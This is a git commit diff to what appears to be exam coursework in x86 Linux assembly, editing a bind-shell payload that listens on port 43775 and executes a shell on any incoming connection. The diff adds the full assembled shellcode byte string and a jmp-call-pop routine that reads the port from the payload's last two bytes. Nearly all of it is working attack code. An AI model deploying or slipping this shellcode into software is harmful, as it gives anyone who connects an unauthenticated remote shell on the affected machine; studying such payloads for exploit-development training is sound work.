minor updates

2013-03-09 11:41:17 +01:00 · 2013-03-09 11:41:17 +01:00 · 6cfe507410
commit 6cfe507410
parent 535c3c197a
4 changed files with 16 additions and 5 deletions
--- a/exam1/shell_bind_tcp.nasm
+++ b/exam1/shell_bind_tcp.nasm
@ -135,7 +135,7 @@ port_in_esp:
 	push edx		; ANY HOST (0.0.0.0)}			||		struct in_addr sin_addr (unsigned long s_addr) };
 	;push DWORD 0x0100007f	; For 127.0.0.1 HOST
 	;push WORD 0xffaa	; PORT 43775 (reverse),			||	 	unsigned short sin_port,
-	push WORD [edi]		; PORT is specified in the bottom of the code / shellcode. Last two bytes in HEX.
+	push WORD [edi]		; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.

 	push WORD bx		; 2 - AF_INET				|| struct sockaddr { short sin_family,
 	mov ecx, esp		; Save PTR to sockaddr struct in ECX
--- a/exam1/shell_bind_tcp_smaller
+++ b/exam1/shell_bind_tcp_smaller
--- a/exam1/shell_bind_tcp_smaller.nasm
+++ b/exam1/shell_bind_tcp_smaller.nasm
@ -3,11 +3,13 @@
 ; 2013 March
 ;
 ; DESC:
-; Binds to a port 12345
+; Binds to a port 43775
 ; Execs Shell on incoming connection
 ;
-; TODO:
-; 1. Port number should be easily configurable;
+;
+; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"
+;
+; Port is the last two bytes of the shellcode. In hex \xaa\xff  (0xaaff = 43775)
 ;
 ;

@ -27,12 +29,17 @@ _start:
 	int 0x80
 	mov esi, eax		; save socket fd in ESI for later

+
+	jmp short call_get_port
+port_in_esp:
+	pop edi			; getting port address from ESP
+
 	push BYTE 102
 	pop eax			; socketcall
 	inc ebx			; 2 = SYS_BIND bind()
 	xor edx, edx
 	push edx		; 0 = ANY HOST (0.0.0.0)}		||		struct in_addr sin_addr (unsigned long s_addr) };
-	push WORD 0x3930	; PORT 12345 (reverse),			||	 	unsigned short sin_port,
+	push WORD [edi]		; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
 	push WORD bx		; 2 = AF_INET				|| struct sockaddr { short sin_family,
 	mov ecx, esp		; Save PTR to sockaddr struct in ECX
 	push BYTE 16		; 	socklen_t addrlen);
@ -85,3 +92,7 @@ dup2_loop:
 	mov al, 11		; execve
 	int 0x80

+call_get_port:
+	call port_in_esp
+	db 0xaa, 0xff		; BYTE (43775 in straight hex)
+
--- a/exam1/shell_bind_tcp_smaller.o
+++ b/exam1/shell_bind_tcp_smaller.o